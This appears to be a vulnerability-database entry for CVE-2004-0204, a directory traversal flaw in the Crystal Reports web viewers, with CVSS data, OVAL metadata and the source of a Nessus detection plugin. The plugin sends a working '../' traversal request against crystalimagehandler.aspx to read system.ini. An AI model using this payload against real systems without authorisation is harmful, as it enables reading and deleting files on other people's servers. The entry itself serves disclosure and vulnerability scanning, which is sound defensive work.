Vulnerabilities > CVE-2004-0204 - Directory Traversal vulnerability in Business Objects Crystal Reports Web Form Viewer

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
bea
borland-software
businessobjects
microsoft
nessus
exploit available
NVD
Published: 2004-08-06
Updated: 2018-10-12

Summary

Directory traversal vulnerability in the web viewers for Business Objects Crystal Reports 9 and 10, and Crystal Enterprise 9 or 10, as used in Visual Studio .NET 2003 and Outlook 2003 with Business Contact Manager, Microsoft Business Solutions CRM 1.2, and other products, allows remote attackers to read and delete arbitrary files via ".." sequences in the dynamicimag argument to crystalimagehandler.aspx.

Vulnerable Configurations

Part Description Count
Application
Bea
9
Application
Borland_Software
1
Application
Businessobjects
6
Application
Microsoft
3

Exploit-Db

descriptionBusiness Objects Crystal Reports 9/10 Web Form Viewer Directory Traversal Vulnerability. CVE-2004-0204. Remote exploit for windows platform
idEDB-ID:24077
last seen2016-02-02
modified2004-05-03
published2004-05-03
reporterImperva Application Defense Center
sourcehttps://www.exploit-db.com/download/24077/
titleBusiness Objects Crystal Reports 9/10 Web Form Viewer Directory Traversal Vulnerability

Nessus

NASL familyCGI abuses
NASL idCRYSTAL_REPORTS_DIRECTORY_TRAVERSAL.NASL
descriptionThe remote host is running a version of Crystal Report Web interface that is vulnerable to a remote directory traversal attack. An attacker exploiting this issue would be able to read or delete arbitrary files outside of the web root.
last seen2020-06-01
modified2020-06-02
plugin id12271
published2004-06-11
reporterThis script is Copyright (C) 2004-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/12271
titleMS04-017: Crystal Reports Web Viewer Could Allow Information Disclosure and DoS (842689) (uncredentialed check)
code
#
# (C) Tenable Network Security, Inc.
#

if ( NASL_LEVEL < 3000 ) exit(0);

include("compat.inc");

if (description)
{
 script_id(12271);
 script_version ("1.32");
 script_cvs_date("Date: 2018/11/15 20:50:16");

 script_cve_id("CVE-2004-0204");
 script_bugtraq_id(10260);
 script_xref(name:"MSFT", value: "MS04-017");
 script_xref(name:"MSKB", value:"842689");

 script_name(english:"MS04-017: Crystal Reports Web Viewer Could Allow Information Disclosure and DoS (842689) (uncredentialed check)");
 script_summary(english:"Crystal Report virtual directory traversal");

 script_set_attribute(attribute:"synopsis",value:
"The web application running on the remote host has a directory
traversal vulnerability." );
 script_set_attribute(attribute:"description", value:
"The remote host is running a version of Crystal Report Web interface
that is vulnerable to a remote directory traversal attack.  An
attacker exploiting this issue would be able to read or delete
arbitrary files outside of the web root." );
 script_set_attribute(
  attribute:"see_also", 
  value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2004/ms04-017"
 );
 script_set_attribute(
  attribute:"solution", 
  value:"Upgrade the software or utilize ACLs on the virtual directory."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2004/06/11");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/06/08");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:businessobjects:crystal_reports_server");
 script_end_attributes();

 script_category(ACT_GATHER_INFO);
 script_family(english:"CGI abuses");
 script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);

dirs = make_list(
  cgi_dirs(),
  "/CrystalReportWebFormViewer",
  "/CrystalReportWebFormViewer2",
  "/crystalreportViewers"
);

foreach dir (dirs)
{
  url = dir + "/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini";
  res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail: 1);
	
  if ( "[drivers]" >< res[2] )
  {
    if (report_verbosity > 0)
    {
      report = string(
        "\n",
        "Nessus accessed system.ini by requesting the following URL :\n\n",
        "  ", build_url(port: port, qs: url), "\n"
      );

      if (report_verbosity > 1)
        report += string("\nWhich revealed the contents :\n\n", res[2], "\n");

      security_hole(port:port, extra:report);
    }
    else security_hole(port);

    exit(0);
  }
}

Oval

accepted2016-02-19T10:00:00.000-04:00
classvulnerability
contributors
  • nameAndrew Buttner
    organizationThe MITRE Corporation
  • nameJonathan Baker
    organizationThe MITRE Corporation
descriptionDirectory traversal vulnerability in the web viewers for Business Objects Crystal Reports 9 and 10, and Crystal Enterprise 9 or 10, as used in Visual Studio .NET 2003 and Outlook 2003 with Business Contact Manager, Microsoft Business Solutions CRM 1.2, and other products, allows remote attackers to read and delete arbitrary files via ".." sequences in the dynamicimag argument to crystalimagehandler.aspx.
familywindows
idoval:org.mitre.oval:def:1157
statusaccepted
submitted2004-06-09T12:00:00.000-04:00
titleCrystal Reports Business Objects Directory Traversal
version5

References